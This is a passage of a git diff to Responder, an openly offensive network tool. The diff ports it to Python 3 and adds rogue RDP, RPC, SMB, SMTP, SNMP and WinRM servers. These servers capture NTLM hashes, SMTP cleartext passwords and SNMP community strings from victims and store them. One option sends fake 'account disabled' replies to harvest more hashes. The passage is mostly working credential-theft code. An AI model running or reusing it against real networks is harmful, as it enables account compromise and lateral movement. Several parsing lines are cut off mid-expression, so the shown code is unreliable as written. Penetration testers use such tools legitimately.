take-over set of tools +# created and maintained by Laurent Gaffie. +# email: laurent.gaffie@gmail.com +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +from utils import * +import struct +import re +import ssl +import codecs +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + +from packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer + +cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert) +key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey) + +def ParseNTLMHash(data,client, Challenge): #Parse NTLMSSP v1/v2 + SSPIStart = data.find(b'NTLMSSP') + SSPIString = data[SSPIStart:] + LMhashLen = struct.unpack(' 60: + SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] + SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') + DomainLen = struct.unpack('. +from utils import * +import struct +import re +import ssl +import codecs + +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + +from packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego + +NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" #v2 +Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" #v1 +MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa" + +#for mapper +DSRUAPI = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2" #v4 +LSARPC = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" #v0 +NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" #v1 +WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" #v1 + + + +def Chose3264x(packet): + if Map32 in packet: + return Map32 + else: + return Map64 + +def FindNTLMOpcode(data): + SSPIStart = data.find(b'NTLMSSP') + if SSPIStart == -1: + return False + SSPIString = data[SSPIStart:] + return SSPIString[8:12] + +def ParseRPCHash(data,client, Challenge): #Parse NTLMSSP v1/v2 + SSPIStart = data.find(b'NTLMSSP') + SSPIString = data[SSPIStart:] + LMhashLen = struct.unpack(' 60: + SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] + SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') + DomainLen = struct.unpack('. +import struct, re +import codecs +from utils import * +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler from random import randrange from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data -from SocketServer import BaseRequestHandler -from utils import * -import struct -import re def Is_Anonymous(data): # Detect if SMB auth was Anonymous @@ -43,30 +46,25 @@ def Parse_Nego_Dialect(data): if Dialect[i] == 'NT LM 0.12': return chr(i) + '\x00' - def midcalc(data): #Set MID SMB Header field. return data[34:36] - - def uidcalc(data): #Set UID SMB Header field. return data[32:34] - def pidcalc(data): #Set PID SMB Header field. pack=data[30:32] return pack - def tidcalc(data): #Set TID SMB Header field. pack=data[28:30] return pack def ParseShare(data): packet = data[:] - a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet) + a = re.search(b'(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet) if a: - print text("[SMB] Requested Share : %s" % a.group(0).decode('UTF-16LE')) + print(text("[SMB] Requested Share : %s" % a.group(0).decode('UTF-16LE'))) def GrabMessageID(data): Messageid = data[28:36] @@ -74,8 +72,8 @@ def GrabMessageID(data): def GrabCreditRequested(data): CreditsRequested = data[18:20] - if CreditsRequested == "\x00\x00": - CreditsRequested = "\x01\x00" + if CreditsRequested == b'\x00\x00': + CreditsRequested = b'\x01\x00' else: CreditsRequested = data[18:20] return CreditsRequested @@ -89,23 +87,25 @@ def GrabSessionID(data): return SessionID def ParseSMBHash(data,client, Challenge): #Parse SMB NTLMSSP v1/v2 - SSPIStart = data.find('NTLMSSP') - SSPIString = data[SSPIStart:] + SSPIStart = data.find(b'NTLMSSP') + SSPIString = data[SSPIStart:] LMhashLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() + SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] + SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') DomainLen = struct.unpack(' 25: - FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex') + FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex') LmHash = FullHash[:32].upper() NtHash = FullHash[32:].upper() - WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), LmHash, NtHash) + WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1')) SaveToDb({ 'module': 'SMB', @@ -183,10 +158,9 @@ def ParseLMNTHash(data, client, Challenge): # Parse SMB NTLMv1/v2 }) if NthashLen == 24: - NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper() - LmHash = data[65:65+LMhashLen].encode('hex').upper() - WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, Challenge.encode('hex')) - + NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper() + LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper() + WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1')) SaveToDb({ 'module': 'SMB', 'type': 'NTLMv1', @@ -204,13 +178,13 @@ def IsNT4ClearTxt(data, client): WordCount = data[HeadLen] ChainedCmdOffset = data[HeadLen+1] - if ChainedCmdOffset == "\x75": + if ChainedCmdOffset == "\x75" or ChainedCmdOffset == 117: PassLen = struct.unpack(' 2: Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") - print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password)) + print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))) WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password) @@ -221,12 +195,12 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP while True: data = self.request.recv(1024) self.request.settimeout(1) - Challenge = RandomChallenge() + Challenge = RandomChallenge() if not data: break - if data[0] == "\x81": #session request 139 + if data[0:1] == b"\x81": #session request 139 Buffer = "\x82\x00\x00\x00" try: self.request.send(Buffer) @@ -235,81 +209,86 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP pass ##Negotiate proto answer SMBv2. - if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data): - head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00") - t = SMB2NegoAns() - t.calculate() - packet1 = str(head)+str(t) - buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1 - self.request.send(buffer1) - data = self.request.recv(1024) - ## Session Setup 1 answer SMBv2. - if data[16:18] == "\x00\x00" and data[4:5] == "\xfe": - head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data)) - t = SMB2NegoAns(Dialect="\x10\x02") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1 - self.request.send(buffer1) - data = self.request.recv(1024) - ## Session Setup 2 answer SMBv2. - if data[16:18] == "\x01\x00" and data[4:5] == "\xfe": - head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0") - t = SMB2Session1Data(NTLMSSPNtServerChallenge=Challenge) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1 - self.request.send(buffer1) - data = self.request.recv(1024) - ## Session Setup 3 answer SMBv2. - if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe": - ParseSMB2NTLMv2Hash(data, self.client_address[0], Challenge) - head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data)) - t = SMB2Session2Data() - packet1 = str(head)+str(t) - buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1 - self.request.send(buffer1) - data = self.request.recv(1024) - - # Negotiate Protocol Response smbv1 - if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None: - Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data)) - Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data)) - Body.calculate() - - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - - self.request.send(Buffer) + if data[8:10] == b"\x72\x00" and re.search(rb"SMB 2.\?\?\?", data): + head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00") + t = SMB2NegoAns() + t.calculate() + packet1 = str(head)+str(t) + buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) + self.request.send(NetworkSendBufferPython2or3(buffer1)) data = self.request.recv(1024) - if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # Session Setup AndX Request smbv1 + ## Nego answer SMBv2. + if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe": + head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1')) + t = SMB2NegoAns(Dialect="\x10\x02") + t.calculate() + packet1 = str(head)+str(t) + buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) + self.request.send(NetworkSendBufferPython2or3(buffer1)) + data = self.request.recv(1024) + ## Session Setup 2 answer SMBv2. + if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe": + head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0") + t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge)) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) + self.request.send(NetworkSendBufferPython2or3(buffer1)) + data = self.request.recv(1024) + ## Session Setup 3 answer SMBv2. + if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe': + ParseSMBHash(data, self.client_address[0], Challenge) + if settings.Config.ErrorCode: + ntstatus="\x6d\x00\x00\xc0" + else: + ntstatus="\x22\x00\x00\xc0" + head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus=ntstatus, SessionID=GrabSessionID(data).decode('latin-1')) + t = SMB2Session2Data() + packet1 = str(head)+str(t) + buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) + self.request.send(NetworkSendBufferPython2or3(buffer1)) + data = self.request.recv(1024) + + # Negotiate Protocol Response smbv1 + if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(rb'SMB 2.\?\?\?', data) == None: + Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) + Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data))) + Body.calculate() + + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) + + self.request.send(NetworkSendBufferPython2or3(Buffer)) + data = self.request.recv(1024) + + if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff": # Session Setup AndX Request smbv1 IsNT4ClearTxt(data, self.client_address[0]) # STATUS_MORE_PROCESSING_REQUIRED - Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data)) + Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data))) if settings.Config.CaptureMultipleCredentials and self.ntry == 0: - Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH") + Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge)) else: - Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge) + Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge)) Body.calculate() - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) - if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # STATUS_SUCCESS + if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff": # STATUS_SUCCESS if Is_Anonymous(data): - Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. Body = SMBSessEmpty() - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) else: # Parse NTLMSSP_AUTH packet @@ -317,81 +296,39 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP if settings.Config.CaptureMultipleCredentials and self.ntry == 0: # Send ACCOUNT_DISABLED to get multiple hashes if there are any - Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. Body = SMBSessEmpty() - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) self.ntry += 1 continue # Send STATUS_SUCCESS - Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) Body = SMBSession2Accept() Body.calculate() - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) - if data[8:10] == "\x75\x00" and data[4:5] == "\xff": # Tree Connect AndX Request + if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff": # Tree Connect AndX Request ParseShare(data) - Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data)) + Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data))) Body = SMBTreeData() Body.calculate() - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet + packet1 = str(Header)+str(Body) + Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) - - if data[8:10] == "\x71\x00" and data[4:5] == "\xff": #Tree Disconnect - Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) - Body = "\x00\x00\x00" - - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - - self.request.send(Buffer) - data = self.request.recv(1024) - - if data[8:10] == "\xa2\x00" and data[4:5] == "\xff": #NT_CREATE Access Denied. - Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) - Body = "\x00\x00\x00" - - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - - self.request.send(Buffer) - data = self.request.recv(1024) - - if data[8:10] == "\x25\x00" and data[4:5] == "\xff": # Trans2 Access Denied. - Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) - Body = "\x00\x00\x00" - - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - - self.request.send(Buffer) - data = self.request.recv(1024) - - - if data[8:10] == "\x74\x00" and data[4:5] == "\xff": # LogOff - Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) - Body = "\x02\xff\x00\x27\x00\x00\x00" - - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - - self.request.send(Buffer) - data = self.request.recv(1024) - except: pass @@ -399,35 +336,39 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP class SMB1LM(BaseRequestHandler): # SMB Server class, old version def handle(self): try: - self.request.settimeout(0.5) + self.request.settimeout(1) data = self.request.recv(1024) - Challenge = RandomChallenge() - if data[0] == "\x81": #session request 139 + Challenge = RandomChallenge() + if data[0:1] == b"\x81": #session request 139 Buffer = "\x82\x00\x00\x00" - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) - if data[8:10] == "\x72\x00": #Negotiate proto answer. - head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data)) - Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge) + if data[8:10] == b"\x72\x00": #Negotiate proto answer. + head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) + Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge)) Body.calculate() Packet = str(head)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - self.request.send(Buffer) + Buffer = StructPython2or3('>i', str(Packet))+str(Packet) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) - if data[8:10] == "\x73\x00": #Session Setup AndX Request + if data[8:10] == b"\x73\x00": #Session Setup AndX Request if Is_LMNT_Anonymous(data): - head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) Packet = str(head)+str(SMBSessEmpty()) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - self.request.send(Buffer) + Buffer = StructPython2or3('>i', str(Packet))+str(Packet) + self.request.send(NetworkSendBufferPython2or3(Buffer)) else: ParseLMNTHash(data,self.client_address[0], Challenge) - head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + if settings.Config.ErrorCode: + ntstatus="\x6d\x00\x00\xc0" + else: + ntstatus="\x22\x00\x00\xc0" + head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode=ntstatus,pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) Packet = str(head) + str(SMBSessEmpty()) - Buffer = struct.pack(">i", len(''.join(Packet))) + Packet - self.request.send(Buffer) + Buffer = StructPython2or3('>i', str(Packet))+str(Packet) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) except Exception: self.request.close() diff --git a/servers/SMTP.py b/servers/SMTP.py index b2a5d8a..17fa26f 100644 --- a/servers/SMTP.py +++ b/servers/SMTP.py @@ -16,38 +16,29 @@ # along with this program. If not, see . from utils import * from base64 import b64decode -from SocketServer import BaseRequestHandler +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 class ESMTP(BaseRequestHandler): def handle(self): try: - self.request.send(str(SMTPGreeting())) + self.request.send(NetworkSendBufferPython2or3(SMTPGreeting())) data = self.request.recv(1024) - if data[0:4] == "EHLO": - self.request.send(str(SMTPAUTH())) + if data[0:4] == b'EHLO' or data[0:4] == b'ehlo': + self.request.send(NetworkSendBufferPython2or3(SMTPAUTH())) data = self.request.recv(1024) - if data[0:4] == "AUTH": - self.request.send(str(SMTPAUTH1())) - data = self.request.recv(1024) - - if data: - try: - User = filter(None, b64decode(data).split('\x00')) - Username = User[0] - Password = User[1] - except: - Username = b64decode(data) - - self.request.send(str(SMTPAUTH2())) - data = self.request.recv(1024) - - if data: - try: Password = b64decode(data) - except: Password = data + if data[0:4] == b'AUTH': + AuthPlain = re.findall(b'(?<=AUTH PLAIN )[^\r]*', data) + if AuthPlain: + User = list(filter(None, b64decode(AuthPlain[0]).split(b'\x00'))) + Username = User[0].decode('latin-1') + Password = User[1].decode('latin-1') SaveToDb({ 'module': 'SMTP', @@ -56,7 +47,35 @@ class ESMTP(BaseRequestHandler): 'user': Username, 'cleartext': Password, 'fullhash': Username+":"+Password, - }) + }) + + else: + self.request.send(NetworkSendBufferPython2or3(SMTPAUTH1())) + data = self.request.recv(1024) + + if data: + try: + User = list(filter(None, b64decode(data).split(b'\x00'))) + Username = User[0].decode('latin-1') + Password = User[1].decode('latin-1') + except: + Username = b64decode(data).decode('latin-1') + + self.request.send(NetworkSendBufferPython2or3(SMTPAUTH2())) + data = self.request.recv(1024) + + if data: + try: Password = b64decode(data).decode('latin-1') + except: Password = data + + SaveToDb({ + 'module': 'SMTP', + 'type': 'Cleartext', + 'client': self.client_address[0], + 'user': Username, + 'cleartext': Password, + 'fullhash': Username+":"+Password, + }) except Exception: pass diff --git a/servers/SNMP.py b/servers/SNMP.py new file mode 100755 index 0000000..718b5e3 --- /dev/null +++ b/servers/SNMP.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python +# This file is part of Responder, a network take-over set of tools +# created and maintained by Laurent Gaffie. +# email: laurent.gaffie@gmail.com +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +from utils import * +from binascii import hexlify +from pyasn1.codec.ber.decoder import decode + +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + +class SNMP(BaseRequestHandler): + def handle(self): + data = self.request[0] + received_record, rest_of_substrate = decode(data) + + snmp_version = int(received_record['field-0']) + + if snmp_version == 3: + full_snmp_msg = hexlify(data).decode('utf-8') + received_record_inner, _ = decode(received_record['field-2']) + snmp_user = str(received_record_inner['field-3']) + engine_id = hexlify(received_record_inner['field-0']._value).decode('utf-8') + auth_params = hexlify(received_record_inner['field-4']._value).decode('utf-8') + + + SaveToDb({ + "module": "SNMP", + "type": "SNMPv3", + "client" : self.client_address[0], + "user": snmp_user, + "hash": auth_params, + "fullhash": "{}:{}:{}:{}".format(snmp_user, full_snmp_msg, engine_id, auth_params) + }) + else: + community_string = str(received_record['field-1']) + snmp_version = '1' if snmp_version == 0 else '2c' + + SaveToDb( + { + "module": "SNMP", + "type": "Cleartext SNMPv{}".format(snmp_version), + "client": self.client_address[0], + "user": community_string, + "cleartext": community_string, + "fullhash": community_string, + } + ) diff --git a/servers/WinRM.py b/servers/WinRM.py new file mode 100644 index 0000000..bf730e4 --- /dev/null +++ b/servers/WinRM.py @@ -0,0 +1,184 @@ +#!/usr/bin/env python +# This file is part of Responder, a network take-over set of tools +# created and maintained by Laurent Gaffie. +# email: laurent.gaffie@gmail.com +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +import struct +import codecs +from utils import * +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler, StreamRequestHandler +else: + from SocketServer import BaseRequestHandler, StreamRequestHandler +from base64 import b64decode, b64encode +from packets import NTLM_Challenge +from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans +from packets import WPADScript, ServeExeFile, ServeHtmlFile + + +# Parse NTLMv1/v2 hash. +def ParseHTTPHash(data, Challenge, client, module): + LMhashLen = struct.unpack(' 24: + NthashLen = 64 + DomainLen = struct.unpack('. -import utils -import ConfigParser +import utils, sys, random +if (sys.version_info > (3, 